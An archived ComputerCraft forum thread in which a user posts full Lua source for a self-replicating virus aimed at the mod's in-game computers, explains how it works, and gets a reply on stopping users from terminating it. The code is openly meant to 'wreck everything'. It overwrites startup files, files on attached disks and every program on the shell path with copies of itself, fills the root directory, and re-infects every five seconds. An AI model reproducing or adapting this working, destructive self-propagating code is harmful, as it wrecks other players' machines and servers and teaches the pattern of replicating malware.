This is a read-only snapshot of the ComputerCraft forums, taken in April 2020.
ComputerCraftPrograms
GreaseMonkey's profile picture

A decent evalquine resident virus

Started by GreaseMonkey, 04 April 2012 - 08:40 AM
GreaseMonkey #1

GreaseMonkey's profile picture

9 posts

Posted 04 April 2012 - 10:40 AM
OK guys, this is just a simple virus designed to wreck everything. It is by no means stealthy.

CODE:
Spoiler

local xpayload = [[
-- evalquine resident ComputerCraft virus
-- by GreaseMonkey, 2012-04-04

local payload, xshell
payload, xshell = ...

local function wreck_everything()
local function split(s,token)
  local l = {}
  local pos = 1
  while pos <= #s do
	local npos = string.find(s,token,pos,true)
	if npos == nil then
	  break
	end
	l[#l+1] = string.sub(s,pos,npos-1)
	pos = npos+1
  end
  l[#l+1] = string.sub(s,pos)
  return l
end

local function infect_startup_unsafe(xto)
  if fs.exists(xto) then
	fs.delete(xto)
  end
  local fp = io.open(xto,"w")
  fp:write("local xpayload = [".."[\n")
  fp:write(payload)
  fp:write("]".."]\nloadstring(xpayload)(xpayload,shell)\n")
  fp:close()
end

local function infect_startup(xto)
  local r,s
  r,s = pcall(infect_startup_unsafe, xto)
  if not r then
	print("FAIL "..xto..": "..s)
  end
end

-- infect /startup
infect_startup("startup")

-- infect any disks
-- based on code in /rom/programs/shell
for k,side in pairs(redstone.getSides()) do
  if disk.isPresent(side) then
	local target = disk.getMountPath(side)
	infect_startup(fs.combine(target,"startup"))
  end
end

-- wreck everything in shell.path
local spath = xshell.path()
--local spath = ".:/rom/programs:/rom/programs/turtle:/rom/programs/computer:/rom/programs/http"
for k,p in ipairs(split(spath,":")) do
  local pref = string.sub(p,1,1)
  if pref == "/" or pref == "\\" then
	for k,name in ipairs(fs.list(p)) do
	  -- try to infect the file in question
	  local r = pcall(infect_startup_unsafe, fs.combine(p,name))
	  if not r then
		-- we couldn't infect it - infect it in the root instead.
		infect_startup(name)
	  end
	end
  end
  os.sleep(0.05)
end

end

local function wrecker()
  while true do
	os.sleep(5)
	wreck_everything()
  end
end

-- call wreck_everything
wreck_everything()
print("This system is wrecked")

-- now bring up a shell
parallel.waitForAll(
  wrecker, function()
	xshell.run("/rom/programs/shell")
  end
)
]]
loadstring(xpayload)(xpayload,shell)

HOW IT WORKS:
Basically, the payload is in a string, which is loaded with loadstring() and called with some parameters that it needs, one parameter is itself, and the other parameter is the current shell, which isn't exactly exported by this point.

This relies on infect_startup_unsafe (misnamed, it infects just about everything, not just the startup files), which writes the payload along with the start and end of the file. infect_startup pcalls this and will spit out an error if it fails for whatever reason, but oh well.

It infects the startup files of the computer, any disks, any executables in your shell path, and if it can't infect those it'll infect your system by spamming them in the root directory.

Once it's done that, it'll spawn a shell and a process which does the wrecking process every 5 seconds (minus the spawning another shell bit, of course).

If you run any of the "infected" files… it starts infecting again!

Admittedly I have forgotten to add a check for termination. That I will leave as an exercise to the reader. This WILL make a horrible mess of your computer though.



Now, can we PLEASE not have any more noob virus posts?
Wolvan #2

Wolvan's profile picture

378 posts

Location In the TARDIS

Posted 04 April 2012 - 11:02 AM
Terminate safe? Just add a

os.pullEvent = os.pullEventRaw
at the top of your code :)/>/>